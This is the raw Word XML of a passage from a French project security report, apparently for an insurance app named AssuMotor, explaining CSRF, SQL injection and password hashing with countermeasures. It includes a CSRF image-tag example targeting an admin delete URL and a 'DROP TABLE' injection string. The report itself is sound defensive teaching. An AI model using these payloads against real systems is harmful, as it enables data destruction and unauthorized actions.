        <w:t>Une attaque CSRF exploite la confiance qu'un site accorde au navigateur d'un utilisateur authentifié. L'attaquant force la victime à exécuter, à son insu, une action sensible sur un site où elle est connectée. La spécificité de cette attaque est qu'elle ne nécessite ni vol de mot de passe ni compromission de session : elle utilise simplement le fait que le navigateur transmet automatiquement les cookies de session avec chaque requête, même lorsque cette requête est déclenchée depuis un site tiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A7199E" w14:textId="77777777" w:rsidR="00752E97" w:rsidRPr="00490839" w:rsidRDefault="00752E97" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750CF7F0" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risques et exemple concret</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB217C6" w14:textId="4D23E4CA" w:rsidR="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve">Les impacts varient selon les actions accessibles au compte visé : suppression de données, modification de préférences, transfert d'argent, ou dans un contexte assurance, annulation d'une souscription. Un exemple concret dans le projet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve"> : un administrateur connecté visite un forum où un attaquant a posté une image piégée &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve"> src="https://assumotor.fr/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>subscription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>delete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t>/42" /&gt;. Le navigateur, en tentant de charger l'image, envoie automatiquement les cookies de session de l'administrateur, ce qui déclencherait la suppression de la souscription si aucune protection n'est en place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE4BAAA" w14:textId="77777777" w:rsidR="00752E97" w:rsidRPr="00752E97" w:rsidRDefault="00752E97" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3138205C" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comment se protéger</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E46E989" w14:textId="046BA8D2" w:rsidR="00490839" w:rsidRPr="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve">La contre-mesure standard consiste à générer un jeton secret unique associé à chaque formulaire ou action sensible. Ce jeton, connu du serveur mais imprévisible pour un attaquant externe, doit être présent dans la requête pour qu'elle soit acceptée. Un site tiers ne peut pas deviner ce jeton, ce qui rend l'attaque impossible sans une compromission préalable. Il est également recommandé de définir l'attribut </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve"> sur les cookies de session (valeur Lax ou Strict) pour empêcher leur transmission automatique lors de requêtes provenant d'un domaine externe. Enfin, l'utilisation de la méthode HTTP POST pour toutes les actions modifiant l'état du serveur constitue une bonne pratique complémentaire, car elle empêche notamment les attaques par simple balise &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t>&gt; ou &lt;a&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB72499" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="6903C16B" w14:textId="48E7A197" w:rsidR="003A6B7F" w:rsidRDefault="00752E97" w:rsidP="00752E97">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc233817785"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t xml:space="preserve">C. </w:t>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Injection SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="390E39EA" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Définition</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29731A71" w14:textId="3FCA24B6" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t>L'injection SQL est une attaque qui consiste à insérer, dans un champ de saisie ou un paramètre de requête, des instructions SQL malveillantes qui seront exécutées par la base de données. Elle exploite les cas où le code applicatif construit ses requêtes SQL par concaténation de chaînes contenant des données utilisateur, sans séparation claire entre la structure de la requête et ses paramètres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC8AE41" w14:textId="77777777" w:rsidR="00752E97" w:rsidRPr="00490839" w:rsidRDefault="00752E97" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3334EE75" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risques et exemple concret</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B14FE" w14:textId="682A20B0" w:rsidR="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve">Une injection SQL réussie peut entraîner l'exfiltration complète de la base de données (données personnelles, mots de passe, documents), la modification frauduleuse d'informations, la suppression de tables entières, ou même l'exécution de commandes système sur le serveur selon la configuration. Un exemple emblématique : un champ de recherche construit la requête SELECT * FROM user WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve"> = '$nom'. Si un attaquant saisit dans le champ nom la valeur '); DROP TABLE user; --, la requête devient SELECT * FROM user WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve"> = ''); DROP TABLE user; --'. La base exécute alors deux </w:t>
      </w:r>
      <w:r w:rsidRPr="00490839">
        <w:lastRenderedPageBreak/>
        <w:t>instructions successives : la recherche initiale, puis la suppression complète de la table user. Le préfixe -- neutralise ensuite le reste de la requête d'origine pour éviter toute erreur de syntaxe qui aurait pu alerter le développeur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C67BD81" w14:textId="77777777" w:rsidR="00752E97" w:rsidRPr="00490839" w:rsidRDefault="00752E97" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A46C74" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comment se protéger</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C413AC7" w14:textId="517E9EF1" w:rsidR="00490839" w:rsidRPr="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t>La contre-mesure fondamentale est l'utilisation de requêtes préparées avec paramètres liés. Cette technique sépare strictement le code SQL de ses paramètres : la structure de la requête est envoyée en premier au moteur de base de données, puis les valeurs sont transmises séparément et interprétées uniquement comme des données, jamais comme du code SQL. Ainsi, même si un utilisateur saisit une chaîne contenant des mots-clés SQL, ceux-ci seront traités comme du texte brut. Il faut également valider systématiquement le type et le format des entrées utilisateur en amont, et appliquer le principe de moindre privilège aux comptes de base de données utilisés par l'application, afin de limiter les dégâts potentiels en cas de faille (par exemple, un compte applicatif ne devrait pas avoir les droits DROP TABLE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD089B" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="58402E59" w14:textId="73F0FF8B" w:rsidR="003A6B7F" w:rsidRDefault="00752E97" w:rsidP="00752E97">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc233817786"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t xml:space="preserve">D. </w:t>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Protection des mots de passe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="07B032D1" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Définition</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF141F8" w14:textId="2FB9D86A" w:rsidR="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t>La protection des mots de passe consiste à garantir que même en cas de fuite de la base de données, les mots de passe des utilisateurs ne puissent pas être récupérés en clair. Cela impose de ne jamais stocker les mots de passe tels quels, mais uniquement leur empreinte cryptographique, obtenue par une fonction de hachage à sens unique conçue spécifiquement pour cet usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A1348" w14:textId="77777777" w:rsidR="00752E97" w:rsidRPr="00490839" w:rsidRDefault="00752E97" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73425D2E" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risques et exemple concret</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147CBCBC" w14:textId="6C96E0FE" w:rsidR="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t>Les fuites de bases de données sont un phénomène régulier et médiatisé. Si les mots de passe y sont stockés en clair ou avec un hachage faible, les utilisateurs sont exposés à des conséquences graves, d'autant plus qu'une majorité d'entre eux réutilisent le même mot de passe sur plusieurs sites. Un attaquant récupérant une base contenant des hachages MD5 ou SHA-1 sans sel peut retrouver la plupart des mots de passe en quelques heures via des tables précalculées (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>rainbow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve"> tables) ou par force brute assistée par GPU. Dans le contexte </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t>, une telle fuite permettrait à un attaquant d'usurper l'identité de clients pour souscrire, modifier ou annuler des contrats à leur insu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEAC277" w14:textId="77777777" w:rsidR="00752E97" w:rsidRPr="00490839" w:rsidRDefault="00752E97" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CA2697" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comment se protéger</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106132AB" w14:textId="433CDBD4" w:rsidR="00490839" w:rsidRPr="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve">Trois exigences doivent être respectées. Premièrement, utiliser un algorithme de hachage adapté aux mots de passe, résistant aux attaques par force brute massive : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve">, Argon2 ou </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>scrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve">. Ces algorithmes intègrent nativement un mécanisme de coût configurable qui les rend intentionnellement lents à calculer, ce qui pénalise fortement les attaques massives sans gêner un utilisateur qui ne se connecte que quelques fois par jour. Deuxièmement, appliquer un sel aléatoire unique à chaque mot de passe, ce qui empêche l'usage des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>rainbow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve"> tables et oblige un attaquant à cracker chaque mot de passe individuellement. Troisièmement, prévoir un mécanisme de migration : les paramètres </w:t>
      </w:r>
      <w:r w:rsidRPr="00490839">
        <w:lastRenderedPageBreak/>
        <w:t>cryptographiques doivent pouvoir être renforcés au fil du temps, sans invalider les comptes existants, pour rester en avance sur l'évolution de la puissance de calcul.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF9753" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="37BD2A16" w14:textId="52270438" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc233817787"/>
      <w:r>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00B90A61">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sécurité côté </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>front-end</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:proofErr w:type="spellEnd"/>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610"/>
        <w:gridCol w:w="3156"/>
        <w:gridCol w:w="2260"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5F4C" w14:paraId="6D1DC906" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="6F046D26" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnérabilité / Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="17DC3EDF" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mesure mise en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="7764B26C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Statut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="60DD0F37" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2AB5EBAF" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>XSS (Cross-Site Scripting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="201F5FD5" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="001D6F90">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve">Échappement automatique Twig sur toutes les variables + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>textContent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve"> (non </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>) en JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6EAC3E40" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="0C1F7E7F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B9D9576" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00ED51A2" w:rsidRDefault="003239D4">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED51A2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CSRF (Cross-Site Request Forgery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="077B999A" w14:textId="34C0C79A" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="001D6F90">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve">Jeton CSRF automatique via le composant Form Symfony + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>csrf_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve">() manuel pour les actions hors </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>form</w:t>
            </w:r>
            <w:r w:rsidR="001D6F90" w:rsidRPr="001D6F90">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2BC0523B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r w:rsidRPr="001D6F90">
